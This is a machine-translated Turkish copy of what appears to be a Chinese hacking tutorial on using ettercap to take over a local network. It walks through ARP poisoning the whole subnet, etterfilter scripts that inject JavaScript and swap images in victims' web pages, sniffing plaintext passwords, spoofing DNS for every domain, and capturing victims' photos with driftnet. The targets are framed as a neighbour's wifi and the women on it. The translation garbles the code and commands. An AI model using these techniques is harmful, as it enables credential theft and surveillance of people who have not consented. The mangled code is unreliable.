Zorluk derecesi
Okuma noktası LAN'ı ele geçirmek için ettercap kullanın
Makale yazarı v5est0r
Makale kaynağı i İlkbahar ve Sonbahar Orijinal Ödül Programı
Wen orijinal yazarı: v5est0r, bu makale orijinal i Bahar ödül programına aittir izinsiz çoğaltılması yasaktır
Önsöz:
Elinizde bir defter tutarken ve yan taraftaki kız kardeşin wifi bağlantısına bağlıyken, weibo'yu oraya kaydırıp müzik dinlemeye istekli misiniz?
Metin:
Bu makale ettercap kurulumuna odaklanmaktadır:
sudo apt- almak ettercap'i yükle
0x01 Kıza merhaba demek için bir pencere açtırmak ister misiniz?
Bu genellikle uyarı filtresi komut dosyası kullanırız
Eğer (ip.proto == TCP tcp.dst == 80) {
Eğer (arama (DATA.data, "Accept-Encoding")) {
replace ("Accept-Encoding", "Accept-Çöp!");
# not: yedek dize, orijinal dizeyle aynı uzunluktadır
#msg ("zapped Accept-Encoding! \ n");
}
}
Eğer (ip.proto == TCP tcp.src == 80) {
değiştir (" < baş > "," < baş > < script type = "text / javascript" > alert ("merhaba, ichunqiu!"); < /senaryo > ");
değiştir (" < KAFA > "," < KAFA > < script type = "text / javascript" > alert ("merhaba, ichunqiu!"); < /senaryo > ");
msg ("Tamam !! \ n");
}
Önce program tarafından tanınan bir dosyada derleyin,
etterfilter alert.filter -o alert.ef
Ardından komutu yükleyin (gerçek test komut satırında bir hata var, lütfen grafik arayüzde ettercap -G kullanın)
ettercap -T -q -i eth0 -F alert.ef -M arp: uzak -P dns_spoof /// ///
Sonra kız son sayfada tarayıcıyı açtığında. .
Elbette, Baidu'nun logosunu değiştirmek gibi web sayfasındaki resimleri de değiştirebilirsiniz, ancak bu pek bir anlam ifade etmiyor.
Eğer (ip.proto == TCP tcp.dst == 80) {
Eğer (arama (DATA.data, "Accept-Encoding")) {
replace ("Accept-Encoding", "Accept-Çöp!");
# not: yedek dize, orijinal dizeyle aynı uzunluktadır
#msg ("zapped Accept-Encoding! \ n");
}
}
Eğer (ip.proto == TCP tcp.src == 80) {
replace ("img src =", "img src = http: //pic2016.5442.com: 82/2016/0909/45 / 2.jpg! 960.jpg");
değiştirin ("IMG SRC =", "img src = http: //pic2016.5442.com: 82/2016/0909/45 / 2.jpg! 960.jpg");
msg ("tamam !! \ n");
}
0x02 Bazı kız web sitelerinin belirli şifresiz şifrelerini almak istemiyor musunuz?
ettercap kokla
ifconfig, kali'nin ağ kartını alır, örneğin: eth0, sonra
sudo ettercap -i eth0 -Tq -M arp: uzak /// ///
Örneğin, kardeşinin WordPress blogunun düz metin şifresi ele geçirildi
0x03 Günah çıkarma web sayfasını kız kardeşinize göndermek ister misiniz?
DNS ele geçirme burada kullanılır
İlk olarak 192.168.1.102 gibi bir itiraf sayfası oluşturun
Ettercap'in DNS yapılandırma dosyasını değiştirin
sudo vim /etc/ettercap/etter.dns
Son yoruma ekle
* Bir 192.168.1.102
Bu, tüm alan adlarını bu ip'e çözümlemek içindir.
Ardından hile yapmaya başlamak için dns_spoof eklentisini yükleyin
ettercap -T -i wlan0 -q -P dns_spoof /// ///
Neden bekar bir köpeğim, çünkü DNS korsanlığı yapsam bile itiraf etmedim, kuzenimi helen'e taciz ettim
0x04 Kızların sosyal fotoğraflarını çekmek ister misiniz?
Driftnet ile ettercap kullanmak mükemmeldir
Önce koklayalım
sudo ettercap -i eth0 -Tq -M arp: uzak /// ///
sonra
sudo driftnet -i eth0 -b -a
Bu parametreleri açıklayın
Resme baktığımızda, hata önbelleğe alınan resimlerin artık yüklenmemesi ve test sohbeti günlüğü resimlerimin de okunmasıdır. . Bu 6'yı karşılaştırır
Doğru. Resimde @ v5est0r var.
Makalede bahsedilen makale tüm intraneti zehirlemeye yöneliktir.Testin dikkatli olması gerekir.Tüm intranet ağının anormal olmasına neden olabilir.Ofis içindeyseniz ve öldürülmekten korkmuyorsanız deneyebilirsiniz.